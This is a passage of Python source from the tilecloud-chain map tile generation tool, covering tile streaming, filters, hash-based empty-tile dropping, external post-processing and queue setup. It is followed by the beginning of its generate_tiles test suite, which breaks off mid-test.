]\n\n        if self.options.zoom is None:\n            self.options.zoom = [z for z, r in enumerate(resolutions)]\n\n        # Fill the bounding pyramid\n        tilegrid = self.get_grid(config, layer[\"grid\"])\n        bounding_pyramid = BoundingPyramid(tilegrid=tilegrid)\n        geoms = self.get_geoms(config, layer_name)\n        for zoom in self.options.zoom:\n            if zoom in geoms:\n                extent = geoms[zoom].bounds\n\n                if len([e for e in extent if not math.isnan(e)]) == 0:\n                    _LOGGER.warning(\"bounds empty for zoom %s\", zoom)\n                else:\n                    minx, miny, maxx, maxy = extent\n                    px_buffer = layer[\"px_buffer\"]\n                    m_buffer = px_buffer * resolutions[zoom]\n                    minx -= m_buffer\n                    miny -= m_buffer\n                    maxx += m_buffer\n                    maxy += m_buffer\n                    bounding_pyramid.add(\n                        tilegrid.tilecoord(\n                            zoom,\n                            max(minx, tilegrid.max_extent[0]),\n                            max(miny, tilegrid.max_extent[1]),\n                        )\n                    )\n                    bounding_pyramid.add(\n                        tilegrid.tilecoord(\n                            zoom,\n                            min(maxx, tilegrid.max_extent[2]),\n                            min(maxy, tilegrid.max_extent[3]),\n                        )\n                    )\n\n        if layer[\"meta\"]:\n            self.set_tilecoords(config, bounding_pyramid.metatilecoords(layer[\"meta_size\"]), layer_name)\n        else:\n            self.set_tilecoords(config, bounding_pyramid, layer_name)\n\n    @staticmethod\n    def _tilestream(\n        tilecoords: Iterable[TileCoord],\n        default_metadata: Dict[str, str],\n        all_dimensions: List[Dict[str, str]],\n    ) -> Iterator[Tile]:\n        for tilecoord in tilecoords:\n            for dimensions in 
all_dimensions:\n metadata = {}\n if default_metadata is not None:\n metadata.update(default_metadata)\n for k, v in dimensions.items():\n metadata[\"dimension_\" + k] = v\n yield Tile(tilecoord, metadata=metadata)\n\n def set_tilecoords(self, config: DatedConfig, tilecoords: Iterable[TileCoord], layer_name: str) -> None:\n assert tilecoords is not None\n layer = config.config[\"layers\"][layer_name]\n\n metadata = {\"layer\": layer_name, \"config_file\": config.file}\n if self.options.host is not None:\n metadata[\"host\"] = self.options.host\n self.tilestream = self._tilestream(tilecoords, metadata, self.get_all_dimensions(layer))\n\n def set_store(self, store: TileStore) -> None:\n self.tilestream = cast(Iterator[Tile], store.list())\n\n def counter(self) -> \"Count\":\n count = Count()\n self.imap(count)\n return count\n\n def counter_size(self) -> \"CountSize\":\n count = CountSize()\n self.imap(count)\n return count\n\n def process(self, name: Optional[str] = None, key: str = \"post_process\") -> None:\n gene = self\n\n def get_process(config_file: str, layer_name: str) -> Optional[Process]:\n config = gene.get_config(config_file)\n layer = config.config[\"layers\"][layer_name]\n name_ = name\n if name_ is None:\n name_ = layer.get(key) # type: ignore\n if name_ is not None:\n return Process(config.config[\"process\"][name_], self.options)\n return None\n\n self.imap(MultiAction(get_process))\n\n def get(self, store: TileStore, time_message: Optional[str] = None) -> None:\n assert store is not None\n self.imap(store.get_one, time_message)\n\n def put(self, store: TileStore, time_message: Optional[str] = None) -> None:\n assert store is not None\n\n def put_internal(tile: Tile) -> Tile:\n store.put_one(tile)\n return tile\n\n self.imap(put_internal, time_message)\n\n def delete(self, store: TileStore, time_message: Optional[str] = None) -> None:\n assert store is not None\n\n def delete_internal(tile: Tile) -> Tile:\n store.delete_one(tile)\n return tile\n\n self.imap(delete_internal, time_message)\n\n def imap(self, func: Any, time_message: Optional[str] = None) -> None:\n assert func is not None\n\n class Func:\n \"\"\"Function with an additional field used to names it in timing messages.\"\"\"\n\n def __init__(self, func: Callable[[Tile], Tile], time_message: Optional[str]) -> None:\n self.func = func\n self.time_message = time_message\n\n def __call__(self, tile: Tile) -> Tile:\n return self.func(tile)\n\n def __str__(self) -> str:\n return f\"Func: {self.func}\"\n\n self.functions.append(Func(func, time_message))\n\n def consume(self, test: Optional[int] = None) -> None:\n assert self.tilestream is not None\n\n test = self.options.test if test is None else test\n\n start = datetime.now()\n\n run = Run(self, self.functions_metatiles)\n\n if test is None:\n if TYPE_CHECKING:\n buffer: queue.Queue[Tile] = queue.Queue(int(os.environ.get(\"TILE_QUEUE_SIZE\", \"2\")))\n else:\n buffer = queue.Queue(int(os.environ.get(\"TILE_QUEUE_SIZE\", \"2\")))\n end = False\n\n nb_thread = int(os.environ.get(\"METATILE_NB_THREAD\", \"1\"))\n\n if nb_thread == 1 or not self.multi_thread:\n consume(map(run, self.tilestream), None)\n else:\n should_exit_error = False\n\n def target() -> None:\n _LOGGER.debug(\"Start run\")\n nonlocal should_exit_error\n while not end or not buffer.empty():\n try:\n run(buffer.get(timeout=1))\n except tilecloud.filter.error.TooManyErrors:\n _LOGGER.exception(\"Too many errors\")\n should_exit_error = True\n except queue.Empty:\n pass\n _LOGGER.debug(\"End run\")\n\n 
threads = [threading.Thread(target=target, name=f\"Run {i}\") for i in range(nb_thread)]\n for thread in threads:\n thread.start()\n\n for tile in self.tilestream:\n while True:\n try:\n buffer.put(tile, timeout=1)\n break\n except queue.Full:\n if should_exit_error:\n sys.exit(1)\n\n end = True\n\n for thread in threads:\n thread.join(30)\n\n if self.metatilesplitter_thread_pool is not None:\n self.metatilesplitter_thread_pool.shutdown()\n self.metatilesplitter_thread_pool = None\n\n assert buffer.empty(), buffer.qsize()\n\n else:\n for _ in range(test):\n run(next(self.tilestream))\n\n if self.metatilesplitter_thread_pool is not None:\n self.metatilesplitter_thread_pool.shutdown()\n self.metatilesplitter_thread_pool = None\n\n assert threading.active_count() == 1, \", \".join([str(t) for t in threading.enumerate()])\n\n self.error += run.error\n self.duration = datetime.now() - start\n for ca in self._close_actions:\n ca()\n\n\n
class Count:\n \"\"\"Count the number of generated tiles.\"\"\"\n\n def __init__(self) -> None:\n self.nb = 0\n self.lock = threading.Lock()\n\n def __call__(self, tile: Optional[Tile] = None) -> Optional[Tile]:\n with self.lock:\n self.nb += 1\n return tile\n\n\n
class CountSize:\n \"\"\"Count the number of generated tiles and measure the total generated size.\"\"\"\n\n def __init__(self) -> None:\n self.nb = 0\n self.size = 0\n self.lock = threading.Lock()\n\n def __call__(self, tile: Optional[Tile] = None) -> Optional[Tile]:\n if tile and tile.data:\n with self.lock:\n self.nb += 1\n self.size += len(tile.data)\n return tile\n\n\n
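# Editor's sketch (illustrative only, not part of the original file): the two\n# counters above are appended to the tile pipeline by TileGeneration.counter()\n# and counter_size(), which wrap them in imap(); they are read once consume()\n# has drained the stream:\n#\n# count = gene.counter_size() # plug a CountSize into the pipeline\n# gene.consume()\n# print(count.nb, count.size) # number of tiles seen and total bytes\n\n\n
class HashDropper:\n \"\"\"\n Create a filter that removes a tile's data when it has the specified size and hash.\n\n Used to drop the empty tiles.\n\n The ``store`` is used to delete the empty tiles.\n \"\"\"\n\n def __init__(\n self,\n size: int,\n sha1code: str,\n store: Optional[TileStore] = None,\n queue_store: Optional[TileStore] = None,\n count: Optional[Count] = None,\n ) -> None:\n self.size = size\n self.sha1code = sha1code\n self.store = store\n self.queue_store = queue_store\n self.count = count\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n assert tile.data\n if len(tile.data) != self.size or sha1(tile.data).hexdigest() != self.sha1code: # nosec\n return tile\n else:\n if self.store is not None:\n if tile.tilecoord.n != 1:\n for tilecoord in tile.tilecoord:\n self.store.delete_one(Tile(tilecoord, metadata=tile.metadata))\n else:\n self.store.delete_one(tile)\n _LOGGER.info(\"The tile %s %s is dropped\", tile.tilecoord, tile.formated_metadata)\n if hasattr(tile, \"metatile\"):\n metatile: Tile = tile.metatile\n metatile.elapsed_togenerate -= 1 # type: ignore\n if metatile.elapsed_togenerate == 0 and self.queue_store is not None: # type: ignore\n self.queue_store.delete_one(metatile)\n elif self.queue_store is not None:\n self.queue_store.delete_one(tile)\n\n if self.count:\n self.count()\n\n return None\n\n\n
class MultiAction:\n \"\"\"\n Used to perform an action based on the tile's layer name.\n\n E.g. a HashDropper or Process\n \"\"\"\n\n def __init__(\n self,\n get_action: Callable[[str, str], Optional[Callable[[Tile], Optional[Tile]]]],\n ) -> None:\n self.get_action = get_action\n self.actions: Dict[Tuple[str, str], Optional[Callable[[Tile], Optional[Tile]]]] = {}\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n layer = tile.metadata[\"layer\"]\n config_file = tile.metadata[\"config_file\"]\n action = self.actions.get((config_file, layer))\n if action is None:\n action = self.get_action(config_file, 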
layer)\n self.actions[(config_file, layer)] = action\n if action:\n _LOGGER.debug(\"[%s] Run action %s.\", tile.tilecoord, action)\n return action(tile)\n return tile\n\n\n
class HashLogger:\n \"\"\"Log the tile size and hash.\"\"\"\n\n def __init__(self, block: str, out: Optional[IO[str]]) -> None:\n self.block = block\n self.out = out\n\n def __call__(self, tile: Tile) -> Tile:\n ref = None\n try:\n assert tile.data\n image = Image.open(BytesIO(tile.data))\n except OSError as ex:\n assert tile.data\n _LOGGER.exception(\"%s: %s\", str(ex), tile.data)\n raise\n for px in image.getdata():\n if ref is None:\n ref = px\n elif px != ref:\n _LOGGER.error(\"Error: image is not uniform.\")\n sys.exit(1)\n\n assert tile.data\n print(\n f\"\"\"Tile: {tile.tilecoord} {tile.formated_metadata}\n {self.block}:\n size: {len(tile.data)}\n hash: {sha1(tile.data).hexdigest()}\"\"\", # nosec\n file=self.out,\n )\n return tile\n\n\n
class LocalProcessFilter:\n \"\"\"\n Drop the tiles (coordinates) that shouldn't be generated in this process.\n\n Process 1: process tiles 0 of 3\n Process 2: process tiles 1 of 3\n Process 3: process tiles 2 of 3\n \"\"\"\n\n def __init__(self, nb_process: int, process_nb: int) -> None:\n self.nb_process = nb_process\n self.process_nb = int(process_nb)\n\n def filter(self, tilecoord: TileCoord) -> bool:\n nb = round(tilecoord.z + tilecoord.x / tilecoord.n + tilecoord.y / tilecoord.n)\n return nb % self.nb_process == self.process_nb\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n return tile if self.filter(tile.tilecoord) else None\n\n\n
class IntersectGeometryFilter:\n \"\"\"Drop the tiles (coordinates) that don't intersect the configured geometry.\"\"\"\n\n def __init__(\n self,\n gene: TileGeneration,\n ) -> None:\n self.gene = gene\n\n def filter_tilecoord(\n self, config: DatedConfig, tilecoord: TileCoord, layer_name: str, host: Optional[str] = None\n ) -> bool:\n layer = config.config[\"layers\"][layer_name]\n grid_name = layer[\"grid\"]\n grid = config.config[\"grids\"][grid_name]\n tile_grid = self.gene.get_grid(config, grid_name)\n px_buffer = layer[\"px_buffer\"] + layer[\"meta_buffer\"] if layer[\"meta\"] else 0\n geoms = self.gene.get_geoms(config, layer_name, host=host)\n return self.bbox_polygon( # type: ignore\n tile_grid.extent(tilecoord, grid[\"resolutions\"][tilecoord.z] * px_buffer)\n ).intersects(geoms[tilecoord.z])\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n return (\n tile\n if self.filter_tilecoord(self.gene.get_tile_config(tile), tile.tilecoord, tile.metadata[\"layer\"])\n else None\n )\n\n @staticmethod\n def bbox_polygon(bbox: Tuple[float, float, float, float]) -> Polygon:\n return Polygon(((bbox[0], bbox[1]), (bbox[0], bbox[3]), (bbox[2], bbox[3]), (bbox[2], bbox[1])))\n\n\n
class DropEmpty:\n \"\"\"Create a filter that drops all empty tiles and logs them as errors.\"\"\"\n\n def __init__(self, gene: TileGeneration) -> None:\n self.gene = gene\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n config = self.gene.get_tile_config(tile)\n if not tile or not tile.data:\n _LOGGER.error(\n \"The tile: %s%s is empty\",\n tile.tilecoord if tile else \"not defined\",\n \" \" + tile.formated_metadata if tile else \"\",\n )\n if \"error_file\" in config.config[\"generation\"] and tile:\n self.gene.log_tiles_error(tile=tile, message=\"The tile is empty\")\n return None\n else:\n return tile\n\n\n
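# Worked example (editor's addition, illustrative values): with the\n# LocalProcessFilter above configured as nb_process=3 and process_nb=0, the\n# tile at z=2, x=29, y=35 (n=1) gives nb = round(2 + 29 + 35) = 66, and\n# 66 % 3 == 0, so process 0 keeps it while the two other processes drop it:\n#\n# tile_filter = LocalProcessFilter(nb_process=3, process_nb=0)\n# tile_filter(tile) # -> the tile itself, or None in a foreign process\n\n\n
def quote(arg: str) -> str:\n \"\"\"Add quotes and escaping so the argument can be passed to an external command.\"\"\"\n if 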
\"'\" in arg:\n if '\"' in arg:\n formated_arg = arg.replace(\"'\", \"\\\\'\")\n return f\"'{formated_arg}'\"\n return f'\"{arg}\"'\n else:\n return f\"'{arg}'\"\n elif arg == \"\":\n return \"''\"\n else:\n return arg\n\n\ndef parse_tilecoord(string_representation: str) -> TileCoord:\n \"\"\"Parce the tile coordinates (z/x/y => TileCoord object).\"\"\"\n parts = string_representation.split(\":\")\n coords = [int(v) for v in parts[0].split(\"/\")]\n if len(coords) != 3:\n raise ValueError(\"Wrong number of coordinates\")\n z, x, y = coords\n if len(parts) == 1:\n tilecoord = TileCoord(z, x, y)\n elif len(parts) == 2:\n meta = parts[1].split(\"/\")\n if len(meta) != 2:\n raise ValueError(\"No one '/' in meta coordinates\")\n tilecoord = TileCoord(z, x, y, int(meta[0]))\n else:\n raise ValueError(\"More than on ':' in the tilecoord\")\n return tilecoord\n\n\nclass Process:\n \"\"\"Process a tile throw an external command.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.ProcessCommand, options: Namespace) -> None:\n self.config = config\n self.options = options\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n if tile and tile.data:\n fd_in, name_in = tempfile.mkstemp()\n with open(name_in, \"wb\") as file_in:\n file_in.write(tile.data)\n\n for cmd in self.config:\n args = []\n if (\n not self.options.verbose and not self.options.debug and not self.options.quiet\n ) and \"default\" in cmd[\"arg\"]:\n args.append(cmd[\"arg\"][\"default\"])\n if self.options.verbose and \"verbose\" in cmd[\"arg\"]:\n args.append(cmd[\"arg\"][\"verbose\"])\n if self.options.debug and \"debug\" in cmd[\"arg\"]:\n args.append(cmd[\"arg\"][\"debug\"])\n if self.options.quiet and \"quiet\" in cmd[\"arg\"]:\n args.append(cmd[\"arg\"][\"quiet\"])\n\n if cmd[\"need_out\"]:\n fd_out, name_out = tempfile.mkstemp()\n os.unlink(name_out)\n else:\n name_out = name_in\n\n command = cmd[\"cmd\"] % {\n \"in\": name_in,\n \"out\": name_out,\n \"args\": \" \".join(args),\n \"x\": tile.tilecoord.x,\n \"y\": tile.tilecoord.y,\n \"z\": tile.tilecoord.z,\n }\n _LOGGER.debug(\"[%s] process: %s\", tile.tilecoord, command)\n result = subprocess.run( # pylint: disable=subprocess-run-check\n command, shell=True, capture_output=True # nosec\n )\n if result.returncode != 0:\n tile.error = (\n f\"Command '{command}' on tile {tile.tilecoord} \"\n f\"return error code {result.returncode}:\\n{result.stderr!s}\\n{result.stdout!s}\"\n )\n tile.data = None\n return tile\n\n if cmd[\"need_out\"]:\n os.close(fd_in)\n os.remove(name_in)\n name_in = name_out\n fd_in = fd_out\n\n with open(name_in, \"rb\") as file_out:\n tile.data = file_out.read()\n os.close(fd_in)\n os.remove(name_in)\n\n return tile\n\n\nclass TilesFileStore(TileStore):\n \"\"\"Load tiles to be generate from a file.\"\"\"\n\n def __init__(self, tiles_file: str):\n super().__init__()\n\n self.tiles_file = open(tiles_file, encoding=\"utf-8\") # pylint: disable=consider-using-with\n\n def list(self) -> Iterator[Tile]:\n while True:\n line = self.tiles_file.readline()\n if not line:\n return\n line = line.split(\"#\")[0].strip()\n if line != \"\":\n splitted_line = line.split(\" \")\n try:\n tilecoord = parse_tilecoord(splitted_line[0])\n except ValueError as e:\n _LOGGER.exception(\n \"A tile '%s' is not in the format 'z/x/y' or z/x/y:+n/+n\\n%s\",\n line,\n repr(e),\n )\n continue\n\n yield Tile(\n tilecoord,\n metadata=dict([cast(Tuple[str, str], e.split(\"=\")) for e in splitted_line[1:]]),\n )\n\n\ndef _await_message(_: Any) -> bool:\n try:\n # Just sleep, 
the SQSTileStore will try again after that...\n time.sleep(10)\n return False\n except KeyboardInterrupt:\n raise StopIteration # pylint: disable=raise-missing-from\n\n\ndef get_queue_store(config: DatedConfig, daemon: bool) -> TimedTileStoreWrapper:\n \"\"\"Get the quue tile store (Redis or SQS).\"\"\"\n if \"redis\" in config.config:\n # Create a Redis queue\n conf = config.config[\"redis\"]\n tilestore_kwargs: Dict[str, Any] = {\n \"name\": conf[\"queue\"],\n \"stop_if_empty\": not daemon,\n \"timeout\": conf[\"timeout\"],\n \"pending_timeout\": conf[\"pending_timeout\"],\n \"max_retries\": conf[\"max_retries\"],\n \"max_errors_age\": conf[\"max_errors_age\"],\n \"max_errors_nb\": conf[\"max_errors_nb\"],\n \"connection_kwargs\": conf.get(\"connection_kwargs\", {}),\n \"sentinel_kwargs\": conf.get(\"sentinel_kwargs\"),\n }\n if \"socket_timeout\" in conf:\n tilestore_kwargs[\"connection_kwargs\"][\"socket_timeout\"] = conf[\"socket_timeout\"]\n if \"db\" in conf:\n tilestore_kwargs[\"connection_kwargs\"][\"db\"] = conf[\"db\"]\n if \"url\" in conf:\n tilestore_kwargs[\"url\"] = conf[\"url\"]\n else:\n tilestore_kwargs[\"sentinels\"] = conf[\"sentinels\"]\n tilestore_kwargs[\"service_name\"] = conf.get(\"service_name\", \"mymaster\")\n if \"pending_count\" in conf:\n tilestore_kwargs[\"pending_count\"] = conf[\"pending_count\"]\n if \"pending_max_count\" in conf:\n tilestore_kwargs[\"pending_max_count\"] = conf[\"pending_max_count\"]\n return TimedTileStoreWrapper(RedisTileStore(**tilestore_kwargs), store_name=\"redis\")\n else:\n # Create a SQS queue\n return TimedTileStoreWrapper(\n SQSTileStore(_get_sqs_queue(config), on_empty=_await_message if daemon else maybe_stop),\n store_name=\"SQS\",\n )\n\n\ndef _get_sqs_queue(\n config: DatedConfig,\n) -> \"botocore.client.SQS\":\n if \"sqs\" not in config.config:\n sys.exit(\"The config hasn't any configured queue\")\n sqs = boto3.resource(\"sqs\", region_name=config.config[\"sqs\"].get(\"region\", \"eu-west-1\"))\n return sqs.get_queue_by_name(QueueName=config.config[\"sqs\"][\"queue\"])\n" }, { "alpha_fraction": 0.4238554835319519, "alphanum_fraction": 0.4738631248474121, "avg_line_length": 38.872283935546875, "blob_id": "761cb8ab8fd13d9d49782e7f5b4a6f6818b4f3fa", "content_id": "ca395cfd48bf1629ed485636748c322704be392b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45893, "license_type": "permissive", "max_line_length": 133, "num_lines": 1151, "path": "/tilecloud_chain/tests/test_generate.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nimport shutil\nfrom itertools import product, repeat\nfrom typing import List, Tuple\n\nimport pytest\nfrom testfixtures import LogCapture\n\nfrom tilecloud.store.redis import RedisTileStore\nfrom tilecloud_chain import controller, generate\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestGenerate(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n def test_get_hash(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n for d in (\"-d\", \"\"):\n self.assert_cmd_equals(\n 
cmd=\".build/venv/bin/generate_tiles {} --get-hash 4/0/0 \"\n \"-c tilegeneration/test.yaml -l point\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile: 4/0/0:+8/+8 config_file=tilegeneration/test.yaml dimension_DATE=2012 host=localhost layer=point\n empty_metatile_detection:\n size: 20743\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n Tile: 4/0/0 config_file=tilegeneration/test.yaml dimension_DATE=2012 host=localhost layer=point\n empty_tile_detection:\n size: 334\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n \"\"\",\n )\n\n log_capture.check()\n\n def test_get_wrong_hash(self) -> None:\n for d in (\"-d\", \"-q\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_exit_equals(\n cmd=\".build/venv/bin/generate_tiles {} --get-hash 0/7/5 \"\n \"-c tilegeneration/test.yaml -l all\".format(d),\n main_func=generate.main,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"Error: image is not uniform.\",\n )\n )\n\n def test_get_bbox(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test.yaml --get-bbox 4/4/4 -l point\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile bounds: [425120,343600,426400,344880]\n\"\"\",\n )\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test.yaml --get-bbox 4/4/4:+1/+1 -l point\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile bounds: [425120,343600,426400,344880]\n \"\"\",\n )\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test.yaml --get-bbox 4/4/4:+2/+2 -l point\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile bounds: [425120,342320,427680,344880]\n \"\"\",\n )\n log_capture.check()\n\n @pytest.mark.skip(reason=\"Don't test mapnik\")\n def test_hash_mapnik(self):\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"--get-hash 4/0/0 -c tilegeneration/test.yaml -l mapnik\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile: 4/0/0 config_file=tilegeneration/test.yaml\n empty_tile_detection:\n size: 334\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n \"\"\",\n )\n log_capture.check()\n\n def test_hash_mapnik_grid(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"--get-hash 4/0/0 -c tilegeneration/test.yaml -l all\".format(d),\n main_func=generate.main,\n expected=\"\"\"Tile: 4/0/0 config_file=tilegeneration/test.yaml dimension_DATE=2012 host=localhost layer=all\n empty_metatile_detection:\n size: 334\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n Tile: 4/0/0 config_file=tilegeneration/test.yaml dimension_DATE=2012 host=localhost layer=all\n empty_tile_detection:\n size: 334\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n \"\"\",\n )\n log_capture.check()\n\n def test_test_all(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=f\".build/venv/bin/generate_tiles {d} -c tilegeneration/test-nosns.yaml -t 1\",\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (\"line\", 0, 5, 6),\n (\"line\", 0, 5, 
7),\n (\"line\", 0, 6, 5),\n (\"line\", 0, 6, 6),\n (\"line\", 0, 7, 4),\n (\"line\", 0, 7, 5),\n (\"polygon\", 0, 5, 4),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'line \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 58\n Nb tiles stored: 6\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 3.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 6[0-9][0-9] o\n\n The tile generation of layer 'polygon \\(DATE=2012\\)' is finish\n Nb generated tiles: 1\n Nb tiles dropped: 0\n Nb tiles stored: 1\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [45][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: [45][0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_test_dimensions(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml -t 1 \"\n \"--dimensions DATE=2013\" % d,\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2013/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (\"line\", 0, 5, 6),\n (\"line\", 0, 5, 7),\n (\"line\", 0, 6, 5),\n (\"line\", 0, 6, 6),\n (\"line\", 0, 7, 4),\n (\"line\", 0, 7, 5),\n (\"polygon\", 0, 5, 4),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'line \\(DATE=2013\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 58\n Nb tiles stored: 6\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 3.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 6[0-9][0-9] o\n\n The tile generation of layer 'polygon \\(DATE=2013\\)' is finish\n Nb generated tiles: 1\n Nb tiles dropped: 0\n Nb tiles stored: 1\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [45][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: [45][0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_multigeom(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-multigeom.yaml\",\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/pp/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (0, 5, 4),\n (0, 5, 5),\n (0, 5, 6),\n (0, 5, 7),\n (0, 6, 4),\n (0, 6, 5),\n (0, 6, 6),\n (0, 6, 7),\n (0, 7, 4),\n (0, 7, 5),\n (0, 7, 6),\n (0, 7, 7),\n (1, 11, 8),\n (1, 11, 9),\n (1, 11, 10),\n (1, 11, 11),\n (1, 11, 12),\n (1, 11, 13),\n (1, 11, 14),\n (1, 12, 8),\n (1, 12, 9),\n (1, 12, 10),\n (1, 12, 11),\n (1, 12, 12),\n (1, 12, 13),\n (1, 12, 14),\n (1, 13, 8),\n (1, 13, 9),\n (1, 13, 10),\n (1, 13, 11),\n (1, 13, 12),\n (1, 13, 13),\n (1, 13, 14),\n (1, 14, 8),\n (1, 14, 9),\n (1, 14, 10),\n (1, 14, 11),\n (1, 14, 12),\n (1, 14, 13),\n (1, 14, 14),\n (1, 15, 8),\n (1, 15, 9),\n (1, 15, 10),\n (1, 15, 11),\n (1, 15, 12),\n (1, 15, 13),\n (1, 15, 14),\n (2, 29, 35),\n (2, 39, 21),\n (3, 78, 42),\n (3, 58, 70),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'pp \\(DATE=2012\\)' is finish\n Nb generated tiles: 51\n Nb tiles dropped: 0\n Nb tiles stored: 51\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [34][0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: [79][0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n 
def test_zoom_identifier(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n xy = list(product(range(585, 592), range(429, 432)))\n x = [e[0] for e in xy]\n y = [e[1] for e in xy]\n xy2 = list(product(range(2929, 2936), range(2148, 2152)))\n x2 = [e[0] for e in xy2]\n y2 = [e[1] for e in xy2]\n xy3 = list(product(range(5859, 5864), range(4296, 4304)))\n x3 = [e[0] for e in xy3]\n y3 = [e[1] for e in xy3]\n for d in (\"-d\", \"\"):\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -t 1 -l polygon2 -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_01/%s/%i/%i.png\",\n tiles=list(zip(repeat(\"polygon2\", len(x)), repeat(\"1\", len(x)), x, y)),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon2 \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 43\n Nb tiles stored: 21\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 16 Kio\n Time per tile: [0-9]+ ms\n Size per tile: 788 o\n\n \"\"\",\n )\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -t 1 -l polygon2 -z 1\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_01/%s/%i/%i.png\",\n tiles=list(zip(repeat(\"polygon2\", len(x2)), repeat(\"0_2\", len(x2)), x2, y2)),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon2 \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 36\n Nb tiles stored: 28\n Nb tiles in error: 0\n Total time: 